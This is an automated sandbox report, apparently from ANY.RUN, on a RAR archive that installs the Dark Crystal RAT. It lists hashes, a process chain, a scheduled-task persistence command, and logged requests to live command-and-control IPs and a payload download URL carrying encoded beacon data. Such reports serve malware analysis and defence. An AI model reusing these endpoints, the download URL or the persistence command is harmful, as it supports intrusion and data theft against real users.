File name: | SoftGL.rar |
Full analysis: | https://app.any.run/tasks/eec4c639-018b-4924-8605-128102ed8ed5 |
Verdict: | Malicious activity |
Threats: | DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. |
Analysis date: | June 27, 2022, 12:16:01 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-rar |
File info: | RAR archive data, v5 |
MD5: | 53A97C9DE32C868B76796DF4E141BE92 |
SHA1: | CB63E6DDF6A7976D03683D6974F0FBA6FCA6C521 |
SHA256: | 2913C2F741EDF9BFE1A120119B79251EB33E402C24EEEC24B0D57B58A6090836 |
SSDEEP: | 98304:1McuYJUcS7ivy9kEaDhgjj39oDO3sI66z4:yhB2vy9kEBjL9oa3sla4 |
.rar | | | RAR compressed archive (v5.0) (61.5) |
---|---|---|
.rar | | | RAR compressed archive (gen) (38.4) |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1560 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\SoftGL.rar" | C:\Program Files\WinRAR\WinRAR.exe | Explorer.EXE | |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.91.0 | ||||
2592 | "C:\Users\admin\Desktop\SoftGL.exe" | C:\Users\admin\Desktop\SoftGL.exe | Explorer.EXE | |
User: admin Integrity Level: MEDIUM Exit code: 3221225477 | ||||
35476 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | SoftGL.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft .NET ClickOnce Launch Utility Exit code: 0 Version: 4.0.30319.34209 built by: FX452RTMGDR | ||||
36020 | C:\Windows\System32\rundll32.exe url.dll,FileProtocolHandler C:\Users\admin\AppData\Local\Temp\Lanskoy.exe | C:\Windows\System32\rundll32.exe | — | AppLaunch.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
36348 | "C:\Users\admin\AppData\Local\Temp\Lanskoy.exe" | C:\Users\admin\AppData\Local\Temp\Lanskoy.exe | rundll32.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
36608 | "C:\Windows\System32\WScript.exe" "C:\reviewsessionHost\C97NJf0jgM8RgM1JKct2s5VaBxnwYd.vbe" | C:\Windows\System32\WScript.exe | — | Lanskoy.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
36724 | "C:\Windows\System32\WScript.exe" "C:\reviewsessionHost\file.vbs" | C:\Windows\System32\WScript.exe | — | Lanskoy.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2108 | C:\Windows\system32\cmd.exe /c ""C:\reviewsessionHost\k3Cu6zMzjknS1GJIS.bat" " | C:\Windows\system32\cmd.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3412 | "C:\reviewsessionHost\BrokerNet.exe" | C:\reviewsessionHost\BrokerNet.exe | cmd.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 Version: 5.15.2.0 | ||||
3988 | schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Users\admin\Downloads\csrss.exe'" /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (1560) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
Operation: | write | Name: | ShellExtBMP |
Value: | |||
(PID) Process: | (1560) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
Operation: | write | Name: | ShellExtIcon |
Value: | |||
(PID) Process: | (1560) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\16C\52C64B7E |
Operation: | write | Name: | LanguageList |
Value: en-US | |||
(PID) Process: | (1560) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
Operation: | write | Name: | 2 |
Value: C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip | |||
(PID) Process: | (1560) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
Operation: | write | Name: | 1 |
Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip | |||
(PID) Process: | (1560) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
Operation: | write | Name: | 0 |
Value: C:\Users\admin\AppData\Local\Temp\SoftGL.rar | |||
(PID) Process: | (1560) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
Operation: | write | Name: | name |
Value: 120 | |||
(PID) Process: | (1560) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
Operation: | write | Name: | size |
Value: 80 | |||
(PID) Process: | (1560) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
Operation: | write | Name: | type |
Value: 120 | |||
(PID) Process: | (1560) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
Operation: | write | Name: | mtime |
Value: 100 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3412 | BrokerNet.exe | C:\reviewsessionHost\IMEDICTUPDATE.exe | executable | |
MD5:98A82A4C14B8408AA73EE546B9E38D66 | SHA256:E1CA47CE21392C3BBD48708EBC93D4BC3A89A409F80D674EBA25819B10F693E7 | |||
35476 | AppLaunch.exe | C:\Users\admin\AppData\Local\Temp\Lanskoy.exe | executable | |
MD5:497C81D4177C2F2C0724B57DA4E3BECA | SHA256:C66C491BF92E6185A293FC73CD26E06310A956EAACC05FE0C719B8936FA002C6 | |||
3412 | BrokerNet.exe | C:\Users\admin\Downloads\886983d96e3d3e | text | |
MD5:6EE756327376FA00CA35F77D9EBFCCAE | SHA256:181F79E427892552229FFE471A87B5D8DE6FC23CD6900A2D166DBFD786CBBDBC | |||
36348 | Lanskoy.exe | C:\reviewsessionHost\C97NJf0jgM8RgM1JKct2s5VaBxnwYd.vbe | vbe | |
MD5:6B857F5FBB6E7FCA7C8AEDCBFFB27138 | SHA256:FF6BDEA960B6F0B6D2BDE9ACD59A20F8E99688BC8D74BEAEF6A7DFC90338108F | |||
3412 | BrokerNet.exe | C:\reviewsessionHost\1173b9a28a9c10 | text | |
MD5:4E79DE1FCB032CF733A605113ED77F66 | SHA256:7969BB872161757D65B1F3C7172B7CEA49439B7E6DC324AC73FA6378CCB95FF8 | |||
1560 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb1560.32895\SoftGL.exe | executable | |
MD5:C0932C322488F2FC6FEC7E199CDA3468 | SHA256:8FE7F35D1C24E68DC54D8795CE1CF3661FBAC93773C6918514E999027740B976 | |||
3412 | BrokerNet.exe | C:\Users\admin\Downloads\csrss.exe | executable | |
MD5:98A82A4C14B8408AA73EE546B9E38D66 | SHA256:E1CA47CE21392C3BBD48708EBC93D4BC3A89A409F80D674EBA25819B10F693E7 | |||
36348 | Lanskoy.exe | C:\reviewsessionHost\k3Cu6zMzjknS1GJIS.bat | text | |
MD5:4706EB22D3B04AC667C12AA11E52477D | SHA256:CE2766D2F101B086B5BFC543793B2337D91ADE2584A2DC37F705A0E0D8910B90 | |||
36348 | Lanskoy.exe | C:\reviewsessionHost\BrokerNet.exe | executable | |
MD5:98A82A4C14B8408AA73EE546B9E38D66 | SHA256:E1CA47CE21392C3BBD48708EBC93D4BC3A89A409F80D674EBA25819B10F693E7 | |||
36348 | Lanskoy.exe | C:\reviewsessionHost\file.vbs | text | |
MD5:677CC4360477C72CB0CE00406A949C61 | SHA256:F1CCCB5AE4AA51D293BD3C7D2A1A04CB7847D22C5DB8E05AC64E9A6D7455AA0B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4328 | csrss.exe | GET | — | 217.28.221.151:80 | http://217.28.221.151/DbLocal/dlePrivate/imageUploads/7process/Serverhttp/9LinuxBase/2dle/VideoTrackCentralDownloads.php?aIBRXPdtYXmmC5tQuxfN=8kAfbhziDkUc4JDt&a857e6358b6a66ec9f931d7fef13c4d4=gNxAjM0QDNlJzNygTY0UGO5EmZ5IjNzEjM5IzMwUGOhFjMhRDZ3QmY2UTOxcDM5MzMxQDMxQjM&bc00a30df5d4da97ac074521e205c2f8=gZkdjN2EWY5kTYmZTZyImM4YDNjdDNwYjZ3AjY1cTYzImY1MWOwgjN&8ae9b73744cf429dffe0077659d7eca9=0VfiIiOiMTYiNzYyMmZlBDZkVWZ2MzY0ITNwIDNlV2MwUjZmhTZiwiI2QzNkFGOhVTY3IGMkFmZ1czYzQmNlVWNzUmZ5U2M5IWNiJzY0gzYzIiOicjM5Y2NzcjMhJTOzEjN4MmMlRGNhBTNwImYhJjNxgTYiwiI2MDM1gTMkZ2MkNmM1M2MwcTMldzYmBDZ1MDZwUzYzgzYjRjNwkzNzIiOiATO5MmY2ATMhNTZiFmY4Q2NiBjMyIDZxMjZ3IGZ3MTNis3W | RU | — | — | malicious |
4328 | csrss.exe | GET | — | 217.28.221.151:80 | http://217.28.221.151/DbLocal/dlePrivate/imageUploads/7process/Serverhttp/9LinuxBase/2dle/VideoTrackCentralDownloads.php?aIBRXPdtYXmmC5tQuxfN=8kAfbhziDkUc4JDt&a857e6358b6a66ec9f931d7fef13c4d4=gNxAjM0QDNlJzNygTY0UGO5EmZ5IjNzEjM5IzMwUGOhFjMhRDZ3QmY2UTOxcDM5MzMxQDMxQjM&bc00a30df5d4da97ac074521e205c2f8=gZkdjN2EWY5kTYmZTZyImM4YDNjdDNwYjZ3AjY1cTYzImY1MWOwgjN&323d2c38ec58c3aec027f0ac73cdacfe=d1nI1czY2QzY5YmYkVmY4UmYmVmZmNmZlVWM1AjNzQmYiFmZycTZhBDMmJiOicjM5Y2NzcjMhJTOzEjN4MmMlRGNhBTNwImYhJjNxgTYiwiI2MDM1gTMkZ2MkNmM1M2MwcTMldzYmBDZ1MDZwUzYzgzYjRjNwkzNzIiOiATO5MmY2ATMhNTZiFmY4Q2NiBjMyIDZxMjZ3IGZ3MTNis3W | RU | — | — | malicious |
4328 | csrss.exe | GET | 200 | 217.28.221.151:80 | http://217.28.221.151/DbLocal/dlePrivate/imageUploads/7process/Serverhttp/9LinuxBase/2dle/VideoTrackCentralDownloads.php?aIBRXPdtYXmmC5tQuxfN=8kAfbhziDkUc4JDt&a857e6358b6a66ec9f931d7fef13c4d4=gNxAjM0QDNlJzNygTY0UGO5EmZ5IjNzEjM5IzMwUGOhFjMhRDZ3QmY2UTOxcDM5MzMxQDMxQjM&bc00a30df5d4da97ac074521e205c2f8=gZkdjN2EWY5kTYmZTZyImM4YDNjdDNwYjZ3AjY1cTYzImY1MWOwgjN&8ae9b73744cf429dffe0077659d7eca9=0VfiIiOiMTYiNzYyMmZlBDZkVWZ2MzY0ITNwIDNlV2MwUjZmhTZiwiIyMWNkljN0cTN3cTNilTNlZDMwYDM1QmZiNDZyEGZ3YWNlFDZhVTMmJiOicjM5Y2NzcjMhJTOzEjN4MmMlRGNhBTNwImYhJjNxgTYiwiI2MDM1gTMkZ2MkNmM1M2MwcTMldzYmBDZ1MDZwUzYzgzYjRjNwkzNzIiOiATO5MmY2ATMhNTZiFmY4Q2NiBjMyIDZxMjZ3IGZ3MTNis3W | RU | — | — | malicious |
35476 | AppLaunch.exe | GET | 200 | 185.112.83.99:80 | http://185.112.83.99:80/Lanskoy.exe | RU | executable | 3.04 Mb | malicious |
4328 | csrss.exe | GET | 200 | 217.28.221.151:80 | http://217.28.221.151/DbLocal/dlePrivate/imageUploads/7process/Serverhttp/9LinuxBase/2dle/VideoTrackCentralDownloads.php?N8qyiaI1KKpnXTUHchAw6soLUwSKHwq=7yRPxJCkWkWo3ZNAH&qfsBCfUfdvI8tXdJqiBFTSfZZ=V9R4jRDUGKx6&w4RqQcY09Luto9BdY9TmqJUNi=04YRTVt&bc4ab1fca2b8c32b54ee901a43bc57b6=5ef2b7af8dc3f350c93776891a78c608&bc00a30df5d4da97ac074521e205c2f8=QZlVGO4kTM2EDNiRWY0QWOkZTM4gjYlZ2MlBTM4MjNmJDN1Q2YzMjM&N8qyiaI1KKpnXTUHchAw6soLUwSKHwq=7yRPxJCkWkWo3ZNAH&qfsBCfUfdvI8tXdJqiBFTSfZZ=V9R4jRDUGKx6&w4RqQcY09Luto9BdY9TmqJUNi=04YRTVt | RU | text | 2.02 Kb | malicious |
4328 | csrss.exe | GET | 200 | 217.28.221.151:80 | http://217.28.221.151/DbLocal/dlePrivate/imageUploads/7process/Serverhttp/9LinuxBase/2dle/VideoTrackCentralDownloads.php?aIBRXPdtYXmmC5tQuxfN=8kAfbhziDkUc4JDt&a857e6358b6a66ec9f931d7fef13c4d4=gNxAjM0QDNlJzNygTY0UGO5EmZ5IjNzEjM5IzMwUGOhFjMhRDZ3QmY2UTOxcDM5MzMxQDMxQjM&bc00a30df5d4da97ac074521e205c2f8=gZkdjN2EWY5kTYmZTZyImM4YDNjdDNwYjZ3AjY1cTYzImY1MWOwgjN&323d2c38ec58c3aec027f0ac73cdacfe=d1nI3ETOzIDMxIGO2UWYkljZ1UGO5YjN5MGZmlTOidzY5MzNkNzNkJ2YiJiOicjM5Y2NzcjMhJTOzEjN4MmMlRGNhBTNwImYhJjNxgTYiwiI2MDM1gTMkZ2MkNmM1M2MwcTMldzYmBDZ1MDZwUzYzgzYjRjNwkzNzIiOiATO5MmY2ATMhNTZiFmY4Q2NiBjMyIDZxMjZ3IGZ3MTNis3W | RU | text | 104 b | malicious |
4328 | csrss.exe | GET | 200 | 217.28.221.151:80 | http://217.28.221.151/DbLocal/dlePrivate/imageUploads/7process/Serverhttp/9LinuxBase/2dle/VideoTrackCentralDownloads.php?aIBRXPdtYXmmC5tQuxfN=8kAfbhziDkUc4JDt&a857e6358b6a66ec9f931d7fef13c4d4=gNxAjM0QDNlJzNygTY0UGO5EmZ5IjNzEjM5IzMwUGOhFjMhRDZ3QmY2UTOxcDM5MzMxQDMxQjM&bc00a30df5d4da97ac074521e205c2f8=gZkdjN2EWY5kTYmZTZyImM4YDNjdDNwYjZ3AjY1cTYzImY1MWOwgjN&323d2c38ec58c3aec027f0ac73cdacfe=d1nIwETOhN2NhBzY0QGMlRDNwYDM5Q2Y2gTN2ITMjVTYkZ2N0QTZkdjN4IiOicjM5Y2NzcjMhJTOzEjN4MmMlRGNhBTNwImYhJjNxgTYiwiI2MDM1gTMkZ2MkNmM1M2MwcTMldzYmBDZ1MDZwUzYzgzYjRjNwkzNzIiOiATO5MmY2ATMhNTZiFmY4Q2NiBjMyIDZxMjZ3IGZ3MTNis3W&8ae9b73744cf429dffe0077659d7eca9=d1nIiojIzEmYzMmMjZWZwQGZlVmNzMGNyUDMyQTZlNDM1YmZ4UmIsICMxkTYjdTYwMGNkBTZ0QDM2ATOkNmN4UjNyEzY1EGZmdDN0UGZ3YDOiojI3ITOmdzM3ITYykzMxYDOjJTZkRTYwUDMiJWYyYTM4EmIsIiNzATN4EDZmNDZjJTNjNDM3ETZ3MmZwQWNzQGM1M2M4M2Y0YDM5czMiojIwkTOjJmNwETYzUmYhJGOkdjYwIjMyQWMzY2NiR2NzUjI7xSfikTMul0LJl2TpFlaZNTVtllaWdVTqZleNJTQ650asRVTqp0RP1mUH5kMZJTT41EValXVU10MZRVT0k1RPNzZql0cJNUTp9maJlmUq5kakRVWpZ1VatmQEpFbadVW410RPBTWqplMnRVWpZUbNlXUX9UeJpWWxMGVZRTRUpVaKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzl0UaJDbHRmaGtWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplEWa5mRtJGaxUUS0ZUbj5WOtNWUKl2TpN2MitWNXFGWSFTUCp0QMlGNrlkNJNlYo5UbZxGZxMGcKNETptGbJZTSTpVd5cUY3lTbjpGbXRles1WSzl0ULpXQ5pVdsd0Y3Z1RkRlQD5UNBNkYsJlMi5kQp50ZrhkYwFzVZdkQD5kMnh0Sn9GSThkQ65UdJRUSBJ0UWFlTFl0dBRkTyAzUOBnQTtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SClTaU9WQpNGbSh0YoJ1VRdWTzkFcod0Yop0MSdWRwI1VCNkW5Z0RaVnRHRGVKl2TpV1VihWNVZVUktWSzlUaUl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJUaNpXQDJGa1IjYw50MjxmWyIWeCZUSzEUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3UmlWUYRWesdlWDlzUZBnTYFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUaiZXNXlVaWdEVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUaNpXT6dmaMFTTExkeNpXT0QTeNpXSp9UaNJjYzp0QMlWSFRVavpWS1oESkVnVzImaKNETplUaPlGNyIGckdlW5p0QMlWSp9UarhEZw5UbJNXS51Ue0knT6RzQNpHNp1EeJpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTYiNzYyMmZlBDZkVWZ2MzY0ITNwIDNlV2MwUjZmhTZiwiIyYmMlljM0ImMiVTNmhzYhZGO0QzNlZWZwIWO2EmN3YTZyYTNhVWMmJiOicjM5Y2NzcjMhJTOzEjN4MmMlRGNhBTNwImYhJjNxgTYiwiI2MDM1gTMkZ2MkNmM1M2MwcTMldzYmBDZ1MDZwUzYzgzYjRjNwkzNzIiOiATO5MmY2ATMhNTZiFmY4Q2NiBjMyIDZxMjZ3IGZ3MTNis3W | RU | text | 104 b | malicious |
4664 | AppLaunch.exe | GET | 200 | 185.112.83.99:80 | http://185.112.83.99:80/Lanskoy.exe | RU | executable | 3.04 Mb | malicious |
4328 | csrss.exe | GET | 200 | 217.28.221.151:80 | http://217.28.221.151/DbLocal/dlePrivate/imageUploads/7process/Serverhttp/9LinuxBase/2dle/VideoTrackCentralDownloads.php?aIBRXPdtYXmmC5tQuxfN=8kAfbhziDkUc4JDt&a857e6358b6a66ec9f931d7fef13c4d4=gNxAjM0QDNlJzNygTY0UGO5EmZ5IjNzEjM5IzMwUGOhFjMhRDZ3QmY2UTOxcDM5MzMxQDMxQjM&bc00a30df5d4da97ac074521e205c2f8=gZkdjN2EWY5kTYmZTZyImM4YDNjdDNwYjZ3AjY1cTYzImY1MWOwgjN&323d2c38ec58c3aec027f0ac73cdacfe=d1nIwETOhN2NhBzY0QGMlRDNwYDM5Q2Y2gTN2ITMjVTYkZ2N0QTZkdjN4IiOicjM5Y2NzcjMhJTOzEjN4MmMlRGNhBTNwImYhJjNxgTYiwiI2MDM1gTMkZ2MkNmM1M2MwcTMldzYmBDZ1MDZwUzYzgzYjRjNwkzNzIiOiATO5MmY2ATMhNTZiFmY4Q2NiBjMyIDZxMjZ3IGZ3MTNis3W&8ae9b73744cf429dffe0077659d7eca9=QX9JiI6IyMhJ2MjJzYmVGMkRWZlZzMjRjM1AjM0UWZzATNmZGOlJCLiATM5E2Y3EGMjRDZwUGN0AjNwkDZjZDO1YjMxMWNhRmZ3QDNlR2N2gjI6IyNykjZ3MzNyEmM5MTM2gzYyUGZ0EGM1AjYiFmM2EDOhJCLiYzMwUDOxQmZzQ2YyUzYzAzNxU2NjZGMkVzMkBTNjNDOjNGN2ATO3MjI6ICM5kzYiZDMxE2MlJWYihDZ3IGMyIjMkFzMmdjYkdzM1Iyes0nIwglZphjaJZTSD1ENRdlTrJ1RNhXQq1UMnR1Ts50VZtGZqp1dVd0TsZ0VNhmT65keZR0TtpFROVTREp1MBRVTpdXaJ9SSp9UaRpWWzUVbZpmVX1kaWpXTyEkeOtGbU1kaKd0TtJ1ROJTWy0EeNRlW5VFVNNTWU1ENZd0TzcmaJNXSD1UavpWSpJlaOpGZUlVaWdlWrJERaxmWXlFeNd0TwklaaJzZUlVaG1WT5F1VPlXSqlVMjRVW0UEValmS5VmNJNVWwY0RSBDaYpVa3NlT2k0QkFTOXpFdsdkV3Z1VaNnTsl0cJNlWyw2RkpmRrlkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJl2TpN2MitWNXFGWSFTUCp0QMlGNrlkNJNlYo5UbZxGZxMGcKNETptGbJZTSTpVd5cUY3lTbjpGbXRles1WSzl0ULpXQ5pVdsd0Y3Z1RkRlQD5UNBNkYsJlMi5kQp50ZrhkYwFzVZdkQD5kMnh0Sn9GSThkQ65UdJRUSBJ0UWFlTFl0dBRkTyAzUOBnQTtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SClTaU9WQpNGbSh0YoJ1VRdWTzkFcod0Yop0MSdWRwI1VCNkW5Z0RaVnRHRGVKl2TpV1VihWNVZVUktWSzlUaUl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJUaNpXQDJGa1IjYw50MjxmWyIWeCZUSzEUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3UmlWUYRWesdlWDlzUZBnTYFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUaiZXNXlVaWdEVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUaNpXT6dmaMFTTExkeNpXT0QTeNpXSp9UaNJjYzp0QMlWSFRVavpWS1oESkVnVzImaKNETplUaPlGNyIGckdlW5p0QMlWSp9UarhEZw5UbJNXS51Ue0knT6RzQNpHNp1EeJpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTYiNzYyMmZlBDZkVWZ2MzY0ITNwIDNlV2MwUjZmhTZiwiIyYmMlljM0ImMiVTNmhzYhZGO0QzNlZWZwIWO2EmN3YTZyYTNhVWMmJiOicjM5Y2NzcjMhJTOzEjN4MmMlRGNhBTNwImYhJjNxgTYiwiI2MDM1gTMkZ2MkNmM1M2MwcTMldzYmBDZ1MDZwUzYzgzYjRjNwkzNzIiOiATO5MmY2ATMhNTZiFmY4Q2NiBjMyIDZxMjZ3IGZ3MTNis3W | RU | text | 104 b | malicious |
4328 | csrss.exe | GET | 200 | 217.28.221.151:80 | http://217.28.221.151/DbLocal/dlePrivate/imageUploads/7process/Serverhttp/9LinuxBase/2dle/VideoTrackCentralDownloads.php?aIBRXPdtYXmmC5tQuxfN=8kAfbhziDkUc4JDt&a857e6358b6a66ec9f931d7fef13c4d4=gNxAjM0QDNlJzNygTY0UGO5EmZ5IjNzEjM5IzMwUGOhFjMhRDZ3QmY2UTOxcDM5MzMxQDMxQjM&bc00a30df5d4da97ac074521e205c2f8=gZkdjN2EWY5kTYmZTZyImM4YDNjdDNwYjZ3AjY1cTYzImY1MWOwgjN&dbbde9ec4153e9094bec4f850f2a65ab=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 | RU | text | 104 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
35476 | AppLaunch.exe | 185.106.92.110:5555 | — | MediaServicePlus LLC | RU | malicious |
— | — | 185.106.92.110:5555 | — | MediaServicePlus LLC | RU | malicious |
35476 | AppLaunch.exe | 185.112.83.99:80 | — | Total Server Solutions L.L.C. | RU | malicious |
35824 | WerFault.exe | 104.208.16.93:443 | watson.microsoft.com | Microsoft Corporation | US | suspicious |
4664 | AppLaunch.exe | 185.106.92.110:5555 | — | MediaServicePlus LLC | RU | malicious |
4664 | AppLaunch.exe | 185.112.83.99:80 | — | Total Server Solutions L.L.C. | RU | malicious |
4328 | csrss.exe | 34.117.59.81:443 | ipinfo.io | — | US | whitelisted |
4328 | csrss.exe | 217.28.221.151:80 | — | SIBCOM Ltd. | RU | malicious |
